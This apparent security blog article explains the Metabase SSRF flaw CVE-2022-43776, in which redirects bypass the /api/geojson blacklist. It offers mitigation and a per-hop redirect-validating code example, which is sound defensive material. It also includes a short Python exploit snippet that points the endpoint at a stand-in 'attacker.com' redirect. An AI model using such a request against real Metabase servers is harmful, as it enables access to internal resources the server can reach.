Server Side Request Forgery (SSRF) attacks allow an attacker to exploit a vulnerable application to make unwanted requests in the context of the targeted server. Metabase, an open-source business intelligence tool, recently identified a high-impact SSRF vulnerability referenced as CVE-2022-43776. This vulnerability affects Metabase versions earlier than 44.5. In this article, we will dive deep into the vulnerability and show you an exploit sample, along with some preventative measures.

Vulnerability Details

The vulnerability lies in the way Metabase handles the url parameter of the /api/geojson endpoint. In affected versions, Metabase relied on a blacklist of forbidden hosts and addresses to prevent SSRF. This approach is inherently flawed: the blacklist was applied only to the URL submitted by the user, so an attacker could point the parameter at an external host that answered with a 301 or 302 redirect (the status codes commonly used for URL redirection), and the server would follow the redirect to a destination the blacklist never checked.

By exploiting this vulnerability, an attacker can perform an SSRF attack, potentially leading to unauthorized access to internal resources, data leaks, and other security breaches.

Code Snippet

Below is a code snippet demonstrating a potential exploit leveraging the vulnerable /api/geojson endpoint:

import requests

# Replace with the target Metabase instance
target = 'http://example.com:300'
# Replace with the attacker's server hosting the malicious redirect
attacker_server = 'http://attacker.com'

# The geojson endpoint fetches whatever URL it is handed in the url parameter
exploit_url = f'{target}/api/geojson?url={attacker_server}/redirect'

response = requests.get(exploit_url)

if response.status_code == 200:
    print('Exploit successful!')
else:
    print('Exploit failed.')

This code snippet simulates an attacker's interaction with the vulnerable Metabase instance. When the Metabase instance receives the request to the /api/geojson endpoint, it will follow the redirect specified by attacker_server without validating the final destination, allowing potential SSRF attacks.

Original References

1. CVE-2022-43776: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43776

2. Metabase Security Advisory: https://www.metabase.com/docs/latest/security/security-advisories.html#server-side-request-forgery-vulnerability-in-metabase-44-4-and-earlier-cve-2022-43776

Mitigation

To prevent exploitation of the SSRF vulnerability (CVE-2022-43776) in your Metabase instance, it is highly recommended to upgrade to Metabase version 44.5 or higher. The developers have implemented proper URL validation checks to eliminate the SSRF vulnerability.
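The two properties the original blacklist lacked are (a) checking the addresses a hostname actually resolves to rather than matching strings, and (b) re-checking every hop when a redirect is followed. The following is an added example written for this article, not Metabase's own fix; the function names (is_safe_url, fetch_validating_each_hop), the injectable resolver and fetch callables, and the DNS and HTTP fixtures are assumptions constructed so the check runs offline. The first fixture shows the bypass described above: the submitted URL passes the check, but the redirect it returns points at the server's loopback interface.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

# Added example (not Metabase's own code): resolve-then-check allowlisting
# plus per-hop redirect validation. Names and fixtures are assumptions.

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 5


def resolve_all(hostname):
    """Resolve a hostname to every address it maps to (A and AAAA records)."""
    infos = socket.getaddrinfo(hostname, None)
    return sorted({info[4][0] for info in infos})


def is_safe_url(url, resolver=resolve_all):
    """True only if the scheme is http(s) and every resolved address is globally routable.

    `resolver` is injectable so the check can be tested offline; the default
    performs a real DNS lookup.
    """
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addresses = resolver(parts.hostname)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False
    if not addresses:
        return False
    # is_global is False for loopback, RFC 1918, link-local (169.254.0.0/16,
    # where cloud metadata services live), CGNAT and reserved ranges, so one
    # property check replaces a hand-maintained blacklist.
    return all(ipaddress.ip_address(a).is_global for a in addresses)


def fetch_validating_each_hop(url, fetch, resolver=resolve_all):
    """Follow redirects manually, validating every hop before it is requested.

    `fetch(url)` returns (status_code, headers, body) and must not follow
    redirects itself (with requests: requests.get(url, allow_redirects=False)).
    Raises ValueError when any hop points at a non-public address.
    """
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        if not is_safe_url(current, resolver):
            raise ValueError(f"refusing to fetch non-public URL: {current}")
        status, headers, body = fetch(current)
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            # Location may be relative; resolve it against the current URL.
            current = urljoin(current, headers["Location"])
            continue
        return status, body
    raise ValueError("too many redirects")


# Constructed offline fixtures standing in for DNS and HTTP. 8.8.8.8 is used for
# the "external" host because ipaddress treats RFC 5737 documentation ranges as
# non-global.
FAKE_DNS = {"geo.example.org": ["8.8.8.8"], "localhost": ["127.0.0.1"]}
FAKE_RESPONSES = {
    "http://geo.example.org/public.geojson": (200, {}, b'{"type":"FeatureCollection"}'),
    # An external host whose answer redirects into the server's own loopback.
    "http://geo.example.org/countries.geojson": (
        302, {"Location": "http://localhost:3000/api/session"}, b""),
    "http://localhost:3000/api/session": (200, {}, b"internal response"),
}


def fake_resolver(hostname):
    return FAKE_DNS.get(hostname, [])


def fake_fetch(url):
    return FAKE_RESPONSES[url]


def demo():
    """Run both fixtures through the validator; returns the outcome of each."""
    outcomes = {}
    outcomes["public"] = fetch_validating_each_hop(
        "http://geo.example.org/public.geojson", fake_fetch, fake_resolver)
    try:
        fetch_validating_each_hop(
            "http://geo.example.org/countries.geojson", fake_fetch, fake_resolver)
        outcomes["redirect_to_loopback"] = "fetched"
    except ValueError as exc:
        outcomes["redirect_to_loopback"] = str(exc)
    return outcomes


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Note the check resolves the hostname and then lets the HTTP client resolve it again when connecting, so a DNS answer that changes between the two lookups (DNS rebinding) can still slip through; a complete fix pins the connection to the address that was validated, for example by connecting to the IP and sending the original hostname in the Host header.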

Conclusion

CVE-2022-43776 highlights the importance of secure handling of URL parameters in web applications. SSRF attacks can lead to significant security breaches if not addressed promptly. By staying informed about the latest security vulnerabilities and updating your applications regularly, you can help protect your organization from similar threats.

Remember to upgrade your Metabase instances to version 44.5 or higher to prevent potential exploitation of this vulnerability. Stay safe and stay secure!

Timeline

Published on: 10/26/2022 18:15:00 UTC
Last modified on: 10/28/2022 17:46:00 UTC